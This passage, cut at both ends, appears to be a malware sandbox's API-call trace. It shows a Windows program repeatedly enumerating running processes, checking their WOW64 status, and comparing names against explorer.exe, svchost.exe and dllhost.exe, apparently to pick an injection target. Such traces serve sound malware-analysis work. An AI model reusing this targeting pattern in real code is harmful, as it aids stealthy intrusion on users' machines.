th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0253.357] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.358] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.358] CloseHandle (hObject=0xec) returned 1 [0253.358] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0253.358] CloseHandle (hObject=0xe8) returned 1 [0253.358] Sleep (dwMilliseconds=0x3e8) [0254.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0254.377] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.377] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0254.377] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0254.378] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0254.378] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0254.379] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0254.379] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0254.380] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0254.380] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0254.381] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0254.381] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0254.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0254.382] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0254.382] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0254.383] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0254.383] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0254.384] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0254.384] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0254.385] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0254.385] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0254.386] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0254.386] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.386] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.386] CloseHandle (hObject=0xec) returned 1 [0254.386] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0254.387] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0254.387] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.387] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.387] CloseHandle (hObject=0xec) returned 1 [0254.387] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0254.388] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0254.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0254.388] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0254.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0254.389] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.389] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.389] CloseHandle (hObject=0xec) returned 1 [0254.389] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0254.389] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0254.389] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0254.389] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0254.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0254.389] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.389] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.389] CloseHandle (hObject=0xec) returned 1 [0254.390] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0254.390] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0254.390] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0254.390] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0254.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0254.390] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.390] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.390] CloseHandle (hObject=0xec) returned 1 [0254.390] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0254.390] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0254.390] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0254.390] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0254.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0254.391] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.391] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.391] CloseHandle (hObject=0xec) returned 1 [0254.391] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0254.391] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0254.391] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0254.391] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0254.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0254.391] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.391] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.392] CloseHandle (hObject=0xec) returned 1 [0254.392] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0254.392] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0254.392] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0254.392] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0254.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0254.392] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.392] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.392] CloseHandle (hObject=0xec) returned 1 [0254.392] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0254.392] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0254.392] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0254.392] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0254.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0254.393] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.393] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.393] CloseHandle (hObject=0xec) returned 1 [0254.393] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0254.393] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0254.393] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0254.393] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0254.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0254.393] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.393] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.394] CloseHandle (hObject=0xec) returned 1 [0254.394] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0254.394] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0254.394] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0254.394] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0254.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0254.394] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.394] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.394] CloseHandle (hObject=0xec) returned 1 [0254.394] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0254.394] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0254.394] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0254.394] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0254.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0254.395] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.395] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.395] CloseHandle (hObject=0xec) returned 1 [0254.395] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0254.395] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0254.395] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0254.395] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0254.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0254.395] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.396] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.396] CloseHandle (hObject=0xec) returned 1 [0254.396] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0254.396] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0254.396] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0254.396] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0254.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0254.396] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.396] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.396] CloseHandle (hObject=0xec) returned 1 [0254.396] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0254.396] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0254.396] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0254.396] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0254.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0254.397] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.397] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.397] CloseHandle (hObject=0xec) returned 1 [0254.397] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0254.397] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0254.397] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0254.397] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0254.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0254.397] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.398] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.398] CloseHandle (hObject=0xec) returned 1 [0254.398] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0254.398] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0254.398] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0254.398] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0254.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0254.399] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.399] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.399] CloseHandle (hObject=0xec) returned 1 [0254.399] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0254.399] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0254.399] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0254.399] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0254.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0254.399] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.399] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.399] CloseHandle (hObject=0xec) returned 1 [0254.399] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0254.399] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0254.399] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0254.399] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0254.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0254.400] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.400] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0254.400] CloseHandle (hObject=0xec) returned 1 [0254.400] lstrcmpiA (lpString1="bags shakira tourism.exe", 